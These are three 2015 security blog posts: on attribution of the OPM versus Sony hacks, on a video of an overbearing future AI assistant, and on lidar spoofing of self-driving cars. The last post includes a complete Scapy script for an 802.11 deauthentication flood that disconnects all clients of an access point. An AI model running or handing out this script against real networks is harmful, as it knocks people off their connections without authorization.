Tuesday, September 29, 2015

Attribution: OPM vs Sony

I read Top U.S. spy skeptical about U.S.-China cyber agreement based on today's Senate Armed Services Committee hearing titled United States Cybersecurity Policy and Threats. It contained this statement:

U.S. officials have linked the OPM breach to China, but have not said whether they believe its government was responsible.

[Director of National Intelligence] Clapper said no definite statement had been made about the origin of the OPM hack since officials were not fully confident about the three types of evidence that were needed to link an attack to a given country: the geographic point of origin, the identity of the "actual perpetrator doing the keystrokes," and who was responsible for directing the act.

I thought this was interesting for several reasons. First, does DNI Clapper mean that the US government has not made an official statement attributing the OPM breach to China because all "three types of evidence" are missing, or because we have only one, or perhaps two, of them? If the latter, which elements do we have, and which do we lack?

Second, how specific is the "actual perpetrator doing the keystrokes"? Did DNI Clapper mean that he requires the Intelligence Community to identify a named individual, or at least the responsible team or unit?

Third, and perhaps most importantly, contrast the OPM case with the DPRK hack against Sony Pictures Entertainment. Assuming DNI Clapper and the IC applied the same "three types of evidence" to the SPE case, the attribution must have included the geographic point of origin, the identity of the "actual perpetrator doing the keystrokes," and the party responsible for directing the act, namely the DPRK. The DNI mentioned "broad consensus across the IC regarding attribution," which enabled the administration to apply sanctions in response.

For those wondering whether the DNI is signaling a degradation in attribution capabilities, I direct you to his statement, which says, in the attribution section:

Although cyber operators can infiltrate or disrupt targeted ICT networks, most can no longer assume their activities will remain undetected indefinitely. Nor can they assume that if detected, they will be able to conceal their identities. Governmental and private sector security professionals have made significant advances in detecting and attributing cyber intrusions.

I was pleased to see the DNI refer to the revolution in private sector security intelligence capabilities.

Sunday, September 13, 2015

Good Morning Karen. Cool or Scary?

Last month I spoke at a telecommunications industry event. The briefer before me showed a video by the Hypervoice Consortium, titled Introducing Human Technology: Communications 2025. It consists of a voiceover by a 2025-era Siri-like assistant speaking to her owner, "Karen." The assistant describes what is happening in Karen's household. Fifteen seconds into the video, the assistant says:

The report is due today. I've cleared your schedule so you can focus. Any attempt to override me will be politely rebuffed.

I was already feeling uncomfortable with the scenario, but that is the point at which I really started to squirm. I'll leave it to you to watch the rest of the video and report how you feel about it.

My general conclusion was that I'm wary of putting so much trust in a platform that is likely to be targeted by intruders, who could then manipulate so many aspects of a person's life. What do you think?

By the way, the briefer before me noted that every vision of the future appears to involve solving the "low on milk" problem.

Monday, September 07, 2015

Are Self-Driving Cars Fatally Flawed?

I read the following in the Guardian story Hackers can trick self-driving cars into taking evasive action.

Hackers can easily trick self-driving cars into thinking that another car, a wall or a person is in front of them, potentially paralysing it or forcing it to take evasive action.

Automated cars use laser ranging systems, known as lidar, to image the world around them and allow their computer systems to identify and track objects. But a tool similar to a laser pointer and costing less than $60 can be used to confuse lidar...

The following appeared in the IEEE Spectrum story Researcher Hacks Self-driving Car Sensors.

Using such a system, attackers could trick a self-driving car into thinking something is directly ahead of it, thus forcing it to slow down. Or they could overwhelm it with so many spurious signals that the car would not move at all for fear of hitting phantom obstacles...

Petit acknowledges that his attacks are currently limited to one specific unit but says, “The point of my work is not to say that IBEO has a poor product. I don’t think any of the lidar manufacturers have thought about this or tried this.” 

I had the following reactions to these stories.

First, it's entirely possible that self-driving car manufacturers know about this attack model. They might have decided that it's worth producing cars despite the technical vulnerability. For example, WiFi has no defense against jamming of the RF spectrum, and there are also non-RF methods to disrupt WiFi, as detailed here. Nevertheless, WiFi is everywhere, although lives usually don't depend on it.
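
As an aside for readers unfamiliar with protocol-level WiFi disruption, here is a minimal sketch of one well-known non-RF technique, an 802.11 deauthentication flood, written with Scapy. The interface name and MAC addresses are placeholders I chose for illustration, and traffic like this should only ever be sent against a network you own or are authorized to test.

# Minimal sketch of an 802.11 deauthentication flood using Scapy.
# The MAC addresses and monitor-mode interface name below are
# placeholders for illustration only. Only run this against networks
# you own or are authorized to test.
from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp

AP_MAC     = "00:11:22:33:44:55"   # hypothetical access point BSSID
CLIENT_MAC = "ff:ff:ff:ff:ff:ff"   # broadcast: deauthenticate every client
IFACE      = "wlan0mon"            # wireless card in monitor mode

# Forge a deauthentication frame that appears to come from the AP.
frame = (RadioTap()
         / Dot11(addr1=CLIENT_MAC, addr2=AP_MAC, addr3=AP_MAC)
         / Dot11Deauth(reason=7))

# Replaying the forged frame keeps clients disconnected, disrupting
# the WLAN at the protocol level rather than by jamming the spectrum.
sendp(frame, iface=IFACE, count=100, inter=0.1, verbose=False)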

Second, researcher Jonathan Petit appears to have tested an IBEO Lux lidar unit and not a real self-driving car. We don't know, from the Guardian or IEEE Spectrum articles at least, how a Google self-driving car would handle this attack. Perhaps the vendors have already compensated for it.
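
To make the attack concrete: a lidar unit infers range from the round-trip time of its laser pulse, so an attacker who fires a counterfeit return pulse after a chosen delay can make the sensor report an object at an arbitrary distance. The toy model below is only an illustration of that general principle, with numbers I made up; it says nothing about how the IBEO Lux actually works.

# Toy model of lidar time-of-flight ranging and a spoofed return pulse.
# Illustrative only; not a description of any real sensor's internals.

C = 299_792_458.0  # speed of light, m/s

def range_from_echo(delay_s: float) -> float:
    """A lidar infers distance from the round-trip time of its pulse."""
    return C * delay_s / 2.0

# Genuine echo from a car 40 m ahead:
real_delay = 2 * 40.0 / C
print(f"real target: {range_from_echo(real_delay):.1f} m")

# A counterfeit pulse fired roughly 13.3 ns after the lidar emits its own
# is interpreted as an object only 2 m away.
spoofed_delay = 2 * 2.0 / C
print(f"phantom target: {range_from_echo(spoofed_delay):.1f} m")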

Third, these articles may undermine one of the presumed benefits of self-driving cars, namely that they are safer than human drivers. If self-driving car technology is vulnerable to an attack not found in driver-controlled cars, that is a problem.

Fourth, does this attack mean that driver-controlled cars with similar technology are also vulnerable, or will be? Are there corresponding attacks for systems that detect obstacles on the road and trigger the brakes before the driver can physically respond?
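
As a purely hypothetical illustration of the stakes, consider an automatic braking routine that trusts raw range readings without any plausibility checks. The threshold and logic below are invented for the sketch, not drawn from any real vehicle.

# Hypothetical automatic-emergency-braking check that trusts raw sensor
# ranges. The threshold and readings are invented for illustration.

BRAKE_DISTANCE_M = 5.0  # assumed emergency-braking threshold

def emergency_brake_needed(nearest_obstacle_m: float) -> bool:
    """Brake if the nearest reported obstacle is inside the threshold."""
    return nearest_obstacle_m < BRAKE_DISTANCE_M

# Normal traffic: nearest obstacle 40 m ahead, so no braking.
print(emergency_brake_needed(40.0))   # False

# Spoofed lidar return reporting a phantom object 2 m ahead: the car
# brakes hard even though the road is clear.
print(emergency_brake_needed(2.0))    # True

A production system would presumably fuse lidar with radar and camera data before acting, but that is exactly the kind of adversarial robustness these articles call into question.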

Last, these articles demonstrate the differences between safety and security. Safety, in general, is a discipline designed to improve the well-being of people facing natural, environmental, mindless threats. Security, in contrast, is designed to counter intelligent, adaptive adversaries. I am predisposed to believe that self-driving car manufacturers have focused on the safety aspects of their products far more than the security aspects. It's time to address that imbalance.